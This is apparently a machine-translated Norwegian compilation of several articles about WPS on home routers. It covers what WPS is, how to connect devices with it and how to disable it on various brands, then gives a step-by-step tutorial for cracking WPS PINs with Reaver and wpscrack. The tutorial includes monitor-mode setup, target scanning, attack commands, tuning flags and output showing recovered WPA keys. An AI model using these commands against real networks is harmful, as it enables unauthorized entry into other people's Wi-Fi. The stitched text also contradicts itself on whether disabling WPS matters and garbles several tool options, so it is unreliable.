Hvor er wps-knappen på ruteren. Metoder for å sette opp WPS-knappen på ruteren. Må jeg deaktivere wps på ruteren min?

Den lille knappen merket WPS på ruteren går veldig ofte ubemerket av mange brukere. Det er Internett, og det er bra. Og dette er hva folk som lever i det 21. århundre tenker. Det er på høy tid å bruke alle de tilgjengelige fordelene ved menneskeheten, inkludert datateknologi, for å finne ut hva WPS er i en ruter og forenkle livet ditt.

Teknologi og dens evner

Først må du finne ut hva WPS betyr på ruteren. Forkortelsen WPS står for Wi-Fi Protected Setup, og på russisk - protected Essensen er at to forskjellige enheter som har denne teknologien kan kobles sømløst til hverandre uten noen innstillinger. Det viktige poenget her er at når klienten kobler til, blir tilgangsnøkkelen overført til ham i kryptert form, dette nettverket vil bli kryptert.

Tilkobling ved hjelp av WPS-teknologi kan være maskinvare eller programvare. Maskinvaremetoden er tilstedeværelsen av en fysisk knapp på ruteren, når den trykkes, kobles to enheter til hverandre via et trådløst nettverk. Og programvaremetoden er at brukeren må gå til ruterinnstillingene, finne tilgangsnøkkelen og legge den inn på enheten som må kobles til nettverket. Noen ganger plasserer produsenten nøkkelen i form av et klistremerke på enhetens kropp.

WPS forhåndsinnstilt

Naturligvis må WPS-modusen på ruteren aktiveres. For å gjøre dette, må du gå til innstillingene til ruteren og aktivere WPS. I tillegg lar ruteren deg sette ytterligere innstillinger for en sikker kanal. Faktisk kan du opprette et annet virtuelt nettverk, med dine egne regler - begrense tilgangen til lokale ressurser, begrense Internett-kanalen. Brukeren vil helt sikkert finne all nødvendig informasjon i bruksanvisningen som følger med ruteren.

De fleste produsenter er ofte begrenset til bare ett element i oppsettmenyen - "Aktiver/deaktiver WPS". I slike tilfeller vil det hjelpe å reflashe ruteren. Faktum er at WPS-teknologien får enorm popularitet i verden, og mange produsenter har allerede oppdatert programvaren sin i et forsøk. Alt du trenger å gjøre er å gå til den offisielle nettsiden, finne enheten din i listen og følge instruksjonene, utføre den nødvendige handlingsalgoritmen.

Hva er fordelene fremfor en vanlig forbindelse?

Etter å ha funnet ut hva som er i ruteren, kan brukeren tro at dette er en annen dumhet av produsentene. Hvorfor disse knappene og tastene, fordi du ganske enkelt kan overføre passordet fra Wi-Fi-ruteren. Overlevere! Legg deretter et stykke papir på inngangsdøren med et passord skrevet på eller fjern passordet helt.

WPS-knappen på ruteren ligner en butler - ved å trykke på den slipper gjestene inn i nettverket. Men hva slags nettverk dette er avhenger av eieren av huset. Med denne teknologien kan du gi tilgang til sosiale nettverk, men beskytte mot torrenter for ikke å tette kanalen. Spesielt nysgjerrig er å lukke alle lokale ressurser, slik at nettverksskriveren er synlig. Selv husstandsmedlemmer kan gis tilgang til DLNA og en tynn kanal til Internett - det er ingen grenser, alt er i hendene på eieren.

Trygghet eller paranoia?

Mange lærer om hva WPS er i en ruter fra nyhetsfeeds, der de skriver svart på hvitt om den usikre forbindelsen som denne teknologien skjuler. Etter å ha lest artikkelen undersøker brukeren absolutt ruteren sin i håp om ikke å finne WPS-knapper på kroppen.

Ja, WPS-teknologien har en svak sikkerhetsmekanisme som er relativt enkel å angripe fra utsiden og kan tillate en angriper inn i nettverket. Det er derfor i moderne rutere i WPS-innstillingene kan du finne et element med en viss avskjæringsenhet, hvis formål er å forby mottak av gjester hvis et angrep oppdages. Eiere av gamle enheter vil finne denne funksjonen i rutermenyen etter å ha blinket.

På den annen side, WPS-teknologi, som Wi-Fi, Ethernet, DLNA, Windows, Android - enhver teknologi som er utsatt for hacking. For å få tilgang til ressurser trenger du kunnskap og tid, og de som besitter disse faktorene vil ikke kaste bort tiden sin på spill med private nettverk – innsatsen der er mye høyere.

Endelig

Etter å ha mottatt informasjon om hva WPS er i en ruter, kan brukeren bare bestemme om han trenger denne teknologien eller om den må deaktiveres. Uansett vil avgjørelsen være riktig og til en viss grad trygg. Ved å deaktivere en ubrukt funksjon kan du være sikker på at naboen bak veggen ikke vil gjette passordet til en lett hacket ruter for andre år på rad. Og etter å ha slått den på og konfigurert den riktig, trenger du ikke å være redd for at venner og slektninger som vil koble til Internett, ikke vil se "hvor de ikke skal."

Hvis du først planlegger å bruke en WPS-tilkobling som gjestetilkobling, anbefaler fagfolk å bruke denne teknologien for ikke å opprette forbindelser mellom enheter i huset, fordi alle disse enhetene vil adlyde det konfigurerte nettverket og følgelig vil være synlige for gjester. Det kan ta mer tid å koble en telefon, høyttalere, TV eller kjøleskap til ruteren via Wi-Fi, men dette vil beskytte eieren mot problemer i fremtiden.

Mest sannsynlig er de fleste brukere ikke engang klar over at ruterne deres har teknologi som WPS (eller QSS). Kort sagt og i et enkelt språk er WPS (Wi-Fi Protected Setup) en teknologi som er utviklet spesielt for å forenkle tilkoblingen av enheter til et Wi-Fi-nettverk. Ved å bruke WPS kan du koble enheter til Wi-Fi-ruteren uten å måtte angi passordet for det trådløse nettverket. Noe som er veldig praktisk.

Nesten alle moderne rutere har en WPS-knapp. Den samme delen er i ruterinnstillingene. Og mange er interessert i spørsmålet, hva er denne WPS-knappen for, hva er den til og med, og hvordan du bruker denne teknologien. Vi vil vurdere alle disse spørsmålene i detalj i artikkelen.

Jeg skal vise deg hvordan du kobler forskjellige enheter til et Wi-Fi-nettverk uten å angi passord (bærbare datamaskiner, Android-mobilenheter), og hvordan du konfigurerer (aktiver eller deaktiver) WPS på forskjellige rutere (TP-LINK, ASUS, D-LINK, ZyXel).

Hva er WPS-knappen på ruteren til og hvordan bruker jeg den?

Knappen er nødvendig for å aktivere WPS-teknologi. Det er en slik knapp på nesten alle rutere. Det er vanligvis signert WPS. Det ser omtrent slik ut (på en ASUS-ruter):

Ikke sjelden kombineres knappen med funksjonen for å tilbakestille ruterinnstillingene. Dette skjer veldig ofte på rutere fra TP-LINK.

Vær forsiktig så du ikke trykker på "WPS/RESET"-knappen i lang tid. Etter å ha holdt den i ca. 5 sekunder, vil ruterens innstillinger bli tilbakestilt til fabrikkinnstillingene.

Og på nye rutere fra ZyXel ser knappen for å aktivere WPS-funksjonen slik ut:

I alle fall er det ikke vanskelig å finne en slik knapp på kroppen til ruteren din. Vel, hvis det ikke er der, gå til ruterinnstillingene og se etter det tilsvarende elementet i kontrollpanelet (nedenfor i artikkelen skal jeg vise deg hvordan du gjør dette).

Funksjonen aktiveres med ett klikk på en knapp. Når det gjelder ASUS-ruteren min, må du holde knappen inne i 1 sekund. Når WPS-funksjonen er aktivert, vil indikatoren på ruteren mest sannsynlig begynne å blinke. Strømindikatoren på ASUS-ruteren blinker. Noen rutere har en egen indikator, vanligvis i form av en lås. Funksjonen er aktivert en stund, så slutter indikatoren å blinke. Den kan reaktiveres ved å trykke på en knapp.

Hvordan koble til Wi-Fi uten å angi passord via WPS (QSS)?

Vi har funnet ut hvordan du aktiverer teknologien på ruteren, la oss nå se på prosessen med å koble til forskjellige enheter.

Måter å koble til et Wi-Fi-nettverk uten å angi passord (via WPS):

  • Når det er en WPS-knapp på ruteren og på enheten du kobler til. For eksempel en ekstern USB Wi-Fi-mottaker, så er det bare å trykke på en knapp på begge enhetene og tilkoblingen blir opprettet.
  • Hvis enheten du vil koble til Wi-Fi ikke har en mekanisk knapp, og den ikke finnes på bærbare datamaskiner, smarttelefoner, nettbrett osv., aktiveres WPS av en knapp på ruteren, og på en datamaskin, for For eksempel skjer tilkoblingen automatisk. På mobile enheter velger vi bare tilkoblingen ved hjelp av WPS i innstillingene. Alt avhenger av den spesifikke enheten.
  • Det finnes rutermodeller som ikke har WPS-knapp. Men dette betyr ikke at teknologien ikke støttes. I alle fall kan du aktivere denne teknologien gjennom ruterinnstillingene.
  • Tilkobling med PIN-kode. I innstillingene til WPS-funksjonen er det spesifisert en spesiell PIN-kode, som du også kan koble til enheter med. Bare ved å velge riktig tilkoblingsmetode og taste inn koden.

For å koble til Wi-Fi ved hjelp av metodene beskrevet nedenfor, må ruteren din ha WPS aktivert. Den er aktivert som standard, men ble deaktivert på min D-LINK. Så hvis du ikke har deaktivert noe, vil alt fungere. Hvis noe ikke fungerer, må du sjekke innstillingene. Jeg vil skrive hvordan du gjør dette nedenfor i artikkelen.

Vi kobler en datamaskin (bærbar) på Windows 7, 8, 10 til Wi-Fi via WPS

Alt er veldig enkelt her. Åpne listen over tilgjengelige nettverk for tilkobling på datamaskinen, velg ønsket nettverk og klikk på "Koble til"-knappen.

Et vindu vil dukke opp som ber deg angi et passord. Og nedenfor skal det være en melding "Du kan også koble til ved å trykke på knappen på ruteren." Du må kanskje vente et par sekunder før denne meldingen vises.

Nå trykker du på WPS-knappen på ruteren, og datamaskinen kobler seg til Wi-Fi uten å angi passord.

Det er alt, du kan bruke din trådløse Internett-tilkobling. Det er ikke nødvendig å deaktivere noe på ruteren.

Hvis du har en adapter med en WPS (QSS)-knapp

For eksempel har jeg en WPS-knapp på ASUS-ruteren min, og en QSS-knapp på TP-LINK.

Når du trykker på knappen på begge enhetene, skal en tilkobling opprettes. Dette er sant, men så vidt jeg forstår, må det proprietære Wi-Fi-adapterverktøyet være installert på datamaskinen. Den er plassert på disken som følger med settet. Du kan også laste den ned fra den offisielle nettsiden for adaptermodellen din.

Koble til via WPS-smarttelefoner og nettbrett på Android

For å koble til Wi-Fi uten å angi passord på Android, må du gå til Wi-Fi-innstillinger, velge avanserte innstillinger, deretter velge en tilkobling ved hjelp av WPS, og trykke på knappen på ruteren. Smarttelefonen eller nettbrettet kobles automatisk til Wi-Fi-nettverket.

Disse innstillingene kan se annerledes ut på forskjellige enheter. Men fremgangsmåten vil være den samme. Der kan du også velge å koble til via WPS ved hjelp av en PIN-kode.

Selv med , kan du bruke WPS-teknologi.

Når det gjelder iOS (iPhone, iPad, etc.), så vidt jeg forstår, er det ingen WPS-støtte. Hvis jeg tar feil, hvis du vet, så skriv til meg i kommentarfeltet.

Hvordan aktivere, deaktivere og konfigurere WPS (QSS) på en ruter?

La oss se på de grunnleggende innstillingene for Wi-Fi Protected Setup-teknologi på rutere fra forskjellige produsenter. Det er praktisk talt ingen innstillinger der. Det er i bunn og grunn en teknologinedleggelse. (siden det er aktivert som standard), og endre PIN-koden.

På TP-LINK-rutere

Gå til ruterinnstillingene og gå til "WPS"-fanen. Hvis du ikke vet hvordan du logger på kontrollpanelet, kan du se instruksjonene.

Administrere WPS på ASUS-rutere

Hvis du har en ASUS-ruter, gå til kategorien "Trådløst nettverk" - "WPS".

Rask Wi-Fi-oppsett (WPS) på ZyXEL Keenetic

Bare åpne "Wi-Fi-nettverk"-fanen i innstillingene. Der vil du se de nødvendige innstillingene.

Wi-Fi Protected Setup på D-LINK

Gå til , gå til "Wi-Fi" - "WPS"-fanen. Forresten, som det viser seg, er denne teknologien deaktivert som standard på D-LINK-rutere. Derfor må den slås på.

Vel, ikke glem å lagre innstillingene dine.

konklusjoner

Med WPS (QSS) kan du virkelig raskt koble enheten til Wi-Fi uten å oppgi passord. Teknologien fungerer og er veldig enkel å bruke. Personlig har jeg bare brukt denne funksjonen noen få ganger. Det er ikke nødvendig å koble til nye enheter ofte, og det er ikke vanskelig å skrive inn et passord.

Forresten, hvis du ikke bruker WPS-funksjonen, er det tilrådelig å deaktivere den. Ærlig talt, jeg vet ikke hvorfor, men jeg har allerede kommet over informasjon flere ganger om at det er tilrådelig å deaktivere det av sikkerhetsgrunner. Selv om jeg synes dette er fullstendig tull. Hovedsaken er at det er praktisk for deg å bruke det trådløse nettverket, koble til nye enheter osv.

Wi-Fi-beskyttet oppsett (WPS)- Dette er en funksjon for halvautomatisk oppsett av trådløst nettverk. Laget for å forenkle prosessen med å koble klienter til en ruter spesielt for personer som har minimal kunnskap innen IT-feltet og har problemer med å sette opp utstyr. Betydningen av funksjonen er som følger: hvis du har fysisk tilgang til ruteren, trenger du bare å trykke på en knapp på den, og du kan koble til nettverket uten å angi passordet for Wi-Fi-nettverket.

Hvorfor deaktivere WPS

Til tross for sin bekvemmelighet for en nybegynner, utgjør WPS-protokollen en stor sikkerhetsrisiko. Faktisk er dette en halvåpen dør for en angriper til å gå inn i Wi-Fi-nettverket ditt og som et resultat inn i datamaskinen din med all din personlige informasjon og betalingsdetaljer. Det er mange programmer fritt tilgjengelig på Internett for å hacke trådløse nettverk ved å bruke WPS (Wi-Fi Protected Setup) sårbarheten, som selv et barn kan laste ned og bruke. Derfor, ved å la denne funksjonen være aktivert på ruteren, oppfordrer du naboene dine, som nås av Wi-Fi-signalet ditt, til å prøve å få tilgang til den. Bare for moro skyld, se etter artikler om Wi-Fi-hacking på Internett, og du vil se at for å få uautorisert tilgang bruker hackere oftest enten WPS eller den utdaterte WEP-sikkerhetsmodusen, som også er en alvorlig sårbarhet.

På de fleste rutere som er populære i Russland og Ukraina, er WPS aktivert som standard. Brukere som er mer kyndige innen IT slår den av når de setter opp ruteren, og personer med dårlig kunnskap om datamaskiner og nettverkssikkerhetsproblemer lar naturlig nok den uforståelige innstillingen være "som den er." Du kan plukke opp en Android-smarttelefon og finne ut selv hvem av naboene dine som holder denne modusen slått på. Bare gå til Wi-Fi-delen i innstillingene på telefonen eller nettbrettet, se gjennom listen over tilgjengelige nettverk og ved siden av noen av dem vil du se den samme setningen "WPS tilgjengelig".

Merk! I gammelt TP-Link utstyr, i stedet for forkortelsen WPS (Wi-Fi Protected Setup) kan bli brukt QSS (Quick Security Setup). Derfor, hvis du ikke finner fornavnet, se etter det andre.

Deaktiverer WPS i D-Link DIR-815AC-ruteren

Til å begynne med trenger du. Gå til siden i nettgrensesnittet Wi-Fi → WPS.
Det vil være to undersider her – 2,4 GHz og 5 GHz. Fjern merket WPS og trykk på knappen Søke om på begge sider:

Tilgangspunkt TP-Link TL-WA701ND

Alt er veldig tydelig her - du trenger bare å trykke på en knapp Deaktiver WPS slik at statusen endres til "Deaktivert":

TP-Link Archer C9

Gå til Tilleggsinnstillinger → Trådløs modus → WPS.
Deaktiver ruterens PIN-kode:

TP-Link Archer C7

Og her er et eksempel på en dual-band ruter med det gamle grønne grensesnittet. Her er funksjonen deaktivert separat for 2,4 og 5 GHz-moduler. La oss for eksempel gå til delen Trådløs modus 2,4 GHz → WPS, trykk Deaktiver WPS, klikk på lenken, trykk på knappen.

LinkSys WRT1900AC

  1. Gå til seksjonen i ruterinnstillingene Trådløst;
  2. Gå til fanen Wi-Fi-beskyttet oppsett;
  3. Sett bryteren i posisjon AV;
  4. Klikk OK:

ASUS RT-AC66U

Gå til side Tilleggsinnstillinger → Trådløst nettverk → WPS.
Plukke ut AV:

Som du kan se, på alle rutere er innstillingen i lignende seksjoner og er ikke vanskelig å finne.

For ikke så lenge siden så det ut til at et trådløst nettverk beskyttet med WPA2-teknologi var ganske sikkert. Å finne en enkel nøkkel for å koble til er virkelig mulig. Men hvis du installerer en veldig lang nøkkel, vil verken regnbuetabeller eller til og med GPU-akselerasjon hjelpe deg med å fikse det. Men som det viste seg, kan du koble til et trådløst nettverk uten dette - ved å dra nytte av en nylig oppdaget sårbarhet i WPS-protokollen.

ADVARSEL

All informasjon presenteres kun for pedagogiske formål. Å trenge inn i andres trådløse nettverk kan lett betraktes som en straffbar handling. Tenk med hodet.

Prisen på forenklinger

Det er færre og færre åpne tilgangspunkter du ikke trenger å taste inn for å koble til i det hele tatt. Det ser ut til at de snart kan bli oppført i den røde boken. Hvis en person tidligere kanskje ikke engang visste at et trådløst nettverk kan låses med en nøkkel, og beskytter seg mot eksterne forbindelser, blir han i økende grad fortalt om denne muligheten. Ta for eksempel tilpasset fastvare som ledende leverandører gir ut for populære rutermodeller for å forenkle oppsettet. Du må spesifisere to ting - en pålogging/passord og... en nøkkel for å beskytte det trådløse nettverket. Enda viktigere er at maskinvareprodusentene selv prøver å gjøre oppsettsprosessen enkel. Dermed støtter de fleste moderne rutere mekanismen WPS (Wi-Fi Protected Setup). Med dens hjelp kan brukeren sette opp et sikkert trådløst nettverk i løpet av sekunder, uten å plage seg selv med det faktum at "du må aktivere kryptering et annet sted og registrere en WPA-nøkkel." Jeg skrev inn den åttesifrede symbolske PIN-koden i systemet, som er skrevet på ruteren, og du er ferdig! Og her, hold deg fast. I desember snakket to forskere om alvorlige grunnleggende feil i WPS-protokollen. Det er som en bakdør for enhver ruter. Det viste seg at hvis WPS er aktivert på tilgangspunktet (som for et øyeblikk er aktivert i de fleste rutere som standard), så kan du velge en PIN-kode for tilkobling og trekke ut nøkkelen for tilkobling i løpet av få timer!

Hvordan fungerer WPS?

Ideen til skaperne av WPS er god. Mekanismen angir automatisk nettverksnavn og kryptering. Dermed trenger ikke brukeren å gå inn i nettgrensesnittet og forholde seg til komplekse innstillinger. Og du kan enkelt legge til hvilken som helst enhet (for eksempel en bærbar datamaskin) til et allerede konfigurert nettverk: hvis du skriver inn PIN-koden riktig, vil den motta alle nødvendige innstillinger. Dette er veldig praktisk, og derfor tilbyr alle de store aktørene på markedet (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nå trådløse rutere med WPS-støtte. La oss se på det litt mer detaljert.

Det er tre alternativer for bruk av WPS:

  1. Trykk-knapp-Koble til (PBC). Brukeren trykker på en spesiell knapp på ruteren (maskinvare) og på datamaskinen (programvare), og aktiverer dermed oppsettprosessen. Vi er ikke interessert i dette.
  2. Tast inn en PIN-kode i webgrensesnittet. Brukeren får tilgang til det administrative grensesnittet til ruteren gjennom en nettleser og skriver inn den åttesifrede PIN-koden som er skrevet på enhetens kropp (Figur 1), hvoretter oppsettprosessen skjer. Denne metoden er mer egnet for den første konfigurasjonen av ruteren, så vi vil heller ikke vurdere den.
  3. Tast inn PIN-koden på brukerens datamaskin (Figur 2). Når du kobler til en ruter, kan du åpne en spesiell WPS-sesjon, der du kan konfigurere ruteren eller få eksisterende innstillinger hvis du taster inn PIN-koden riktig. Dette er allerede attraktivt. Det kreves ingen autentisering for å åpne en slik økt. Hvem som helst kan gjøre dette! Det viser seg at PIN-koden allerede er potensielt mottakelig for et bruteforce-angrep. Men dette er bare blomster.

Sårbarhet

Som jeg nevnte tidligere, består PIN-koden av åtte sifre - derfor er det 10^8 (100 000 000) alternativer å matche. Imidlertid kan antall alternativer reduseres betydelig. Faktum er at det siste sifferet i PIN-koden er en slags kontrollsum, som beregnes ut fra de første syv sifrene. Som et resultat får vi allerede 10^7 (10 000 000) opsjoner. Men det er ikke alt! Deretter ser vi nøye på enheten til WPS-autentiseringsprotokollen (figur 3). Det føles som om det er spesialdesignet for å gi rom for brute force. Det viser seg at verifisering av PIN-kode utføres i to trinn. Den er delt i to like deler, og hver del kontrolleres separat! La oss se på diagrammet:

  1. Hvis angriperen etter å ha sendt M4-meldingen mottok en EAP-NACK som svar, kan han være sikker på at den første delen av PIN-koden er feil.
  2. Hvis han mottok en EAP-NACK etter å ha sendt M6, så er den andre delen av PIN-koden feil. Vi får 10^4 (10 000) alternativer for første halvår og 10^3 (1000) for andre. Som et resultat har vi bare 11 000 alternativer for et fullstendig søk. For bedre å forstå hvordan dette vil fungere, se på diagrammet.
  3. Et viktig poeng er mulig søkehastighet. Den er begrenset av hastigheten ruteren behandler WPS-forespørsler med: noen tilgangspunkter vil produsere resultater hvert sekund, andre hvert tiende sekund. Mesteparten av tiden brukes på å beregne den offentlige nøkkelen ved å bruke Diffie-Hellman-algoritmen, den må genereres før trinn M3. Tiden brukt på dette kan reduseres ved å velge en enkel hemmelig nøkkel på klientsiden, noe som vil forenkle beregningene av andre nøkler i fremtiden. Praksis viser at for et vellykket resultat er det vanligvis nok å gå gjennom bare halvparten av alle alternativer, og i gjennomsnitt tar brute force bare fire til ti timer.

Første implementering

Den første implementeringen av brute force som dukket opp var wpscrack-verktøyet (goo.gl/9wABj), skrevet av forsker Stefan Viböck i Python. Verktøyet brukte Scapy-biblioteket, som lar deg injisere vilkårlige nettverkspakker. Skriptet kan bare kjøres under et Linux-system, etter først å ha byttet det trådløse grensesnittet til overvåkingsmodus. Som parametere må du spesifisere navnet på nettverksgrensesnittet i systemet, MAC-adressen til den trådløse adapteren, samt MAC-adressen til tilgangspunktet og navnet (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer begynte å prøve 00000000 forsøk tok 0,95 sekunder prøver 00010009<...>prøver 18660005 forsøk tok 1,08 sekunder prøver 18670004# fant 1. halvdel av PIN-forsøk tok 1,09 sekunder forsøk 18670011 forsøk tok 1,08 sekunder<...>prøver 18674095# fant 2. halvdel av PIN-koden<...>Nettverksnøkkel: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 7 0 6 0 7 3 0 5 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Som du kan se, ble først den første halvdelen av PIN-koden valgt, deretter den andre, og til slutt produserte programmet en klar-til-bruk-nøkkel for å koble til det trådløse nettverket. Det er vanskelig å forestille seg hvor lang tid det ville tatt å finne en nøkkel av denne lengden (61 tegn) med eksisterende verktøy. Wpscrack er imidlertid ikke det eneste verktøyet for å utnytte sårbarheten, og dette er et ganske morsomt øyeblikk: samtidig jobbet en annen forsker, Craig Heffner fra Tactical Network Solutions med det samme problemet. Da han så at en fungerende PoC for å implementere et angrep dukket opp på Internett, publiserte han Reaver-verktøyet sitt. Den automatiserer ikke bare prosessen med å velge WPS-PIN og trekke ut PSK-nøkkelen, men tilbyr også et større antall innstillinger slik at angrepet kan utføres mot et bredt utvalg av rutere. I tillegg støtter den et mye større antall trådløse adaptere. Vi bestemte oss for å ta det til grunn og beskrive i detalj hvordan en angriper kan bruke en sårbarhet i WPS-protokollen for å koble til et sikkert trådløst nettverk.

HVORDAN

Som med alle andre angrep på et trådløst nettverk, trenger vi Linux. Her skal det sies at Reaver er til stede i depotet til den velkjente distribusjonen BackTrack, som også allerede inkluderer de nødvendige driverne for trådløse enheter. Derfor vil vi bruke det nøyaktig.

Trinn 0. Klargjør systemet

På den offisielle nettsiden er BackTrack 5 R1 tilgjengelig for nedlasting som en virtuell maskin under VMware og et oppstartbart ISO-bilde. Jeg anbefaler det siste alternativet. Du kan ganske enkelt skrive bildet på en plate, eller du kan bruke programmet til å lage en oppstartbar USB-flash-stasjon: på en eller annen måte, etter oppstart fra et slikt medium, vil vi umiddelbart ha et system klart for arbeid uten unødvendige problemer.

Krasjkurs om Wi-Fi-hacking

  1. WEP (Wired Equivalent Privacy) Den aller første teknologien for å beskytte et trådløst nettverk viste seg å være ekstremt svak. Du kan hacke det bokstavelig talt på noen få minutter, ved å bruke svakhetene til RC4-chifferet som brukes i det. Hovedverktøyene her er airodump-ng-snifferen for å samle pakker og aircrack-ng-verktøyet, som brukes direkte til å knekke nøkkelen. Det er også et spesialverktøy wesside-ng, som vanligvis hacker alle nærliggende WEP-punkter automatisk.
  2. WPA/WPA2 (trådløs beskyttet tilgang)

Brute force er den eneste måten å finne en nøkkel for et lukket WPA/WPA2-nettverk (og selv da bare hvis det er en dump av det såkalte WPA Handshake, som kringkastes når en klient kobler seg til et tilgangspunkt).

Brut kraft kan vare i dager, måneder og år. For å øke effektiviteten til søket ble spesialiserte ordbøker først brukt, deretter ble regnbuetabeller generert, og senere dukket det opp verktøy som brukte NVIDIA CUDA- og ATI Stream-teknologier for å maskinvare akselerere prosessen ved å bruke GPU. Verktøyene som brukes er aircrack-ng (brute force ved bruk av en ordbok), cowpatty (ved hjelp av regnbuetabeller), pyrit (ved hjelp av et skjermkort).

Trinn 1: Logg på

Standard pålogging og passord er root:toor. Når du er i konsollen, kan du trygt starte "X" (det er separate BackTrack-sammenstillinger - både med GNOME og KDE):

#startx

Trinn 2: Installer Reaver

For å laste ned Reaver trenger vi internett. Derfor kobler vi til patchkabelen eller konfigurerer den trådløse adapteren (menyen "Applikasjoner > Internett > Wicd Network Manager"). Deretter starter vi terminalemulatoren, hvor vi laster ned den nyeste versjonen av verktøyet gjennom depotet:

# apt-get update # apt-get install reaver

Her må jeg si at depotet inneholder versjon 1.3, som personlig ikke fungerte riktig for meg. Etter å ha søkt etter informasjon om problemet fant jeg et innlegg av forfatteren, som anbefaler å oppdatere til høyest mulig versjon ved å sammenstille kilder hentet fra SVN. Dette er generelt den mest universelle installasjonsmetoden (for enhver distribusjon).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Det vil ikke være noen problemer med montering under BackTrack - jeg sjekket det personlig. I Arch Linux-distribusjonen som jeg bruker, er installasjonen enda enklere, takket være tilstedeværelsen av den tilsvarende PKGBUILD:

$ yaourt -S reaver-wps-svn

Trinn 3. Forberedelse for brute force

For å bruke Reaver må du gjøre følgende:

  • bytt den trådløse adapteren til overvåkingsmodus;
  • finn ut navnet på det trådløse grensesnittet;
  • finn ut MAC-adressen til tilgangspunktet (BSSID);
  • sørg for at WPS er aktivert på punktet.

Først, la oss sjekke at det trådløse grensesnittet i det hele tatt er til stede i systemet:

#iwconfig

Hvis utgangen av denne kommandoen inneholder et grensesnitt med en beskrivelse (vanligvis wlan0), betyr det at systemet gjenkjente adapteren (hvis den er koblet til det trådløse nettverket for å laste Reaver, er det bedre å koble fra tilkoblingen). La oss sette adapteren i overvåkingsmodus:

# airmon-ng start wlan0

Denne kommandoen oppretter et virtuelt grensesnitt i overvåkingsmodus, navnet vil bli indikert i kommandoutgangen (vanligvis mon0). Nå må vi finne tilgangspunktet for å angripe og finne ut dets BSSID. La oss bruke verktøyet for å lytte til trådløse sendinger airodump-ng:

#airodump-ngmon0

En liste over tilgangspunkter innenfor rekkevidde vil vises på skjermen. Vi er interessert i poeng med WPA/WPA2-kryptering og PSK-nøkkelautentisering.

Det er bedre å velge en av de første på listen, siden god kommunikasjon med punktet er ønskelig for å utføre et angrep. Hvis det er mange punkter og listen ikke passer på skjermen, kan du bruke et annet velkjent verktøy - kismet, hvor grensesnittet er mer egnet i denne forbindelse. Eventuelt kan du sjekke på stedet om WPS-mekanismen er aktivert på vårt punkt. For å gjøre dette kommer Reaver sammen med (men bare hvis du tar den fra SVN) vaskeverktøyet:

# ./vask -i mon0

Parameteren er navnet på grensesnittet som er byttet til overvåkingsmodus. Du kan også bruke '-f'-alternativet og mate verktøyet en cap-fil opprettet, for eksempel av den samme airodump-ng. Av en eller annen ukjent grunn inkluderte ikke Reaver-pakken i BackTrack vaskeverktøyet. La oss håpe at denne feilen vil være rettet innen denne artikkelen publiseres.

Trinn 4. Kjør brute force

Nå kan du fortsette direkte til å søke etter PIN-koden. I det enkleste tilfellet trenger du ikke mye for å starte Reaver. Du trenger bare å spesifisere navnet på grensesnittet (som vi tidligere byttet til overvåkingsmodus) og BSSID for tilgangspunktet:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

"-vv"-bryteren muliggjør forbedret programutgang slik at vi kan sørge for at alt fungerer som forventet.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Venter på beacon fra 00:21:29:74:67:50 [+] Tilknyttet 00:21:29:74:67:50 (ESSID: linksys) [+] Prøver pin 63979978

Hvis programmet konsekvent sender PIN-er til tilgangspunktet, betyr det at alt har startet bra, og det gjenstår bare å vente dumt. Prosessen kan ta lang tid. Den korteste tiden jeg var i stand til å brutalt tvinge en PIN-kode var omtrent fem timer. Så snart det er valgt, vil programmet gjerne informere deg om det:

[+] Prøver pin 64637129 [+] Nøkkel sprakk på 13654 sekunder [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Det mest verdifulle her er selvfølgelig WPA-PSK-nøkkelen, som du umiddelbart kan bruke til å koble til. Alt er så enkelt at det ikke engang passer inn i hodet ditt.

Er det mulig å forsvare seg?

Foreløpig er det bare én måte å beskytte deg mot et angrep - deaktiver WPS i ruterinnstillingene. Men som det viste seg, er dette ikke alltid mulig. Siden sårbarheten ikke eksisterer på implementeringsnivå, men på protokollnivå, bør du ikke forvente en rask oppdatering fra produsenter som vil løse alle problemene. Det meste de kan gjøre nå er å motstå brutal force så mye som mulig. Hvis du for eksempel blokkerer WPS i én time etter fem mislykkede forsøk på å taste inn PIN-koden, vil søket ta omtrent 90 dager. Men et annet spørsmål er, hvor raskt kan en slik oppdatering rulles ut til millioner av enheter som opererer over hele verden?

Oppgradering av Reaver

I HOWTOen viste vi den enkleste og mest allsidige måten å bruke Reaver-verktøyet på. Imidlertid varierer WPS-implementeringen fra produsent til produsent, så i noen tilfeller kreves ytterligere konfigurasjon. Nedenfor vil jeg gi flere alternativer som kan øke hastigheten og effektiviteten til nøkkelsøk.

  1. Du kan angi kanalnummer og SSID for tilgangspunktet: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Alternativet '—dh-small' har en gunstig effekt på brute force-hastigheten, ettersom det setter en liten verdi for den hemmelige nøkkelen, og letter beregningene på tilgangspunktsiden: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-liten
  3. Standard svartidsavbrudd er fem sekunder. Om nødvendig kan du endre det: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Standardforsinkelsen mellom forsøkene er ett sekund. Den kan også konfigureres: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Noen tilgangspunkter kan blokkere WPS i en viss tid, og mistenker at de blir svindlet. Reaver merker denne situasjonen og setter søket på pause i 315 sekunder som standard, varigheten av denne pausen kan endres: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
